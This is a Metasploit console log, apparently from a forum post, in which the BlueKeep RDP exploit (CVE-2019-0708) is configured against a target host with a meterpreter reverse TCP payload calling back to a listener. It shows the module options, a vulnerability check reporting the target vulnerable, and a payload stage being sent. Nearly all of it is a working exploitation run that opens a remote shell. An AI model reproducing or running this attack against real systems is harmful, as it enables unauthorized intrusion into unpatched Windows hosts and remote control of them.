[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description

---- --------------- -------- -----------

RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect

RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random

RDP_DOMAIN no The client domain name to report during connect

RDP_USER no The username to report during connect, UNSET = random

RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'

RPORT 3389 yes The target port (TCP)

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.109 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check

[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35